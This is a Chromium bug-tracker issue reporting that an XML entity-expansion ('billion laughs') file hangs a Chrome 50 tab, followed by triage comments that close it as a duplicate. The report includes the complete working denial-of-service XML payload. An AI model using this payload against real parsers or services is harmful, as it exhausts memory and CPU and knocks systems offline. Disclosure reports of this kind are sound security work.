New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 616444 link

Starred by 1 user
Status: Duplicate
Merged: issue 602552
Owner:
dominicc@chromium.org
Last visit > 30 days ago
Closed: Jun 2016
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux
Pri: 2
Type: Bug



Sign in to add a comment

XML External Entities - DOS

Reported by mohammad...@gmail.com, Jun 1 2016 
UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36

Steps to reproduce the problem:
1. Host a webserver and put this xml file.

> cat billion.xml

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

2. Open chrome and visit the above link

What is the expected behavior?
The browser tab should not hang

What went wrong?
The browser tag hanged

Did this work before? N/A 

Chrome version: 50.0.2661.102  Channel: stable
OS Version: 
Flash Version: Shockwave Flash 21.0 r0

This is similar to https://bugs.chromium.org/p/chromium/issues/detail?id=9937
Chrome_hang.png
29.3 KB View Download
Chrome_Version.png
15.0 KB View Download

Comment 1 by f...@chromium.org, Jun 2 2016

Components: Blink>XML
Thanks for the report!

Comment 2 by f...@chromium.org, Jun 2 2016

Labels: Security_Impact-Stable
Owner: dominicc@chromium.org
Status: Assigned (was: Unconfirmed)
dominicc@, could you please take a look at this?

DOS attacks typically are not marked as security bugs, but I'm concerned that there might be another underlying issue/bug here.

Comment 3 by f...@chromium.org, Jun 3 2016

Components: Security
Labels: -Type-Bug-Security -Security_Impact-Stable Type-Bug

Comment 4 by dominicc@chromium.org, Jun 6 2016

Mergedinto: 602552
Status: Duplicate (was: Assigned)
Project Member

Comment 5 by sheriffbot@chromium.org, Sep 12 2016

Labels: -Restrict-View-SecurityTeam
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment